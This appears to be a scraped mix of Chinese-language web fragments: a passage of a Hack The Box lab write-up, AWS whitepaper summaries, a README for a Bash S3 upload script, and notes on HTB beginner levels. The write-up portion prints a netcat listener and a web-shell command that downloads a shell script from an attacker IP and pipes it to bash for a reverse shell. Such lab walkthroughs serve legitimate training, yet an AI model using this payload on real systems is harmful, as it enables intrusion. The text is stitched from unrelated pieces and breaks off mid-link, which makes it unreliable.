nc -lvnp 1337
访问如下连接,请求下载 shell.sh
并执行,别怀疑,就是 |bash
,代表执行该脚本
http://thetoppers.htb/shell.php?cmd=curl 10.10.16.6:8000/shell.sh|bash
反弹成功,查看 flag
(靶机ip已变)
复出第一篇!累
thetoppers.htb
/etc/hosts
s3.thetoppers.htb
Amazon S3
awscli
aws configure
aws s3 ls
a980d99281a28d638ac68b9bf9453c2b
AWS白皮书
The focus of this paper is the operational excellence pillar of the Amazon Web
Services (AWS) Well-Architected Framework. It provides guidance to help you
apply best practices in the design, delivery, and maintenance of AWS environments.
AWS白皮书
The focus of this paper is the security pillar of the Well-Architected Framework.
It provides guidance to help you apply best practices in the design, delivery, and
maintenance of secure AWS environments.
需要快速上传并获得文件链接吗? 这个小的Bash脚本将帮助您做到这一点。
将自动为文件提供时间戳后缀,以避免命名冲突。 例如, image.png将作为image-1430566517.png上传。
将放在PATH中的某个位置(例如/ usr / local / bin)。
cp shells3.sh /usr/local/bin/shells3
将配置文件添加到~/.shells3.conf 。 有关配置选项的描述,请参见 。
cp shells3.sample.conf ~ /.shells3.conf
vim ~ /.shells3.conf # Edit the configuration in your favourite editor
上传一个文件
shells3 image.png
兼容性和依赖性
仅在OS X 10.10 Yosemite上进行了
第0层部分靶机免费,部分靶机收费。由于这部分太过简单,因此一笔带过。
第一关Meow是telnet靶场:https://www.bilibili.com/video/BV1nS4y137GQ
第二关Fawn是ftp靶场:https://www.bilibili.com/video/BV11F41147Kf
第三关Dancing是SMB靶场:https://www.bilibili.com/video/BV1nS4y137vm
第四关Redeemer是Redis靶场:https://www.theethica
AWS 简介Amazon Web Services 概览(2018 年 12 月) HTML | PDF
概要介绍所有 AWS 服务。AWS 架构完善的框架(2018 年 11 月) PDF
概要介绍用于验证您的架构的 AWS 架构完善的框架。AWS 云采用框架概览(2017 年 2 月) PDF 可帮助您成功采用 AWS 的框架。AWS 安全性最佳实践(2016 年 月) PDF 关于安全使用 AWS 产品的权威指南。AWS 存储服务概览(2016 年 12 月) PDF
概要介绍 AWS 提供的存储解决方案。
AWS 定价机制说明(2018 年 6 月) PDF
关于使用 AWS 简单月度成本结算器估算每月 AWS 使用成本的指南。
视频介绍:https://www.bilibili.com/video/BV17T4y1i7Uh
官方文档:https://help.hackthebox.com/en/articles/5185158-introduction-to-hack-the-box个人感觉前者偏向实战一些,后者偏向练习题一些。更详细的区别,参见:
https://hacktalk.net/hacking-the-box-htb-vs-vulnhub/过去注册HTB的时候,需要拿到邀请码才行,类似下面视频这种,但是现在你不需要邀请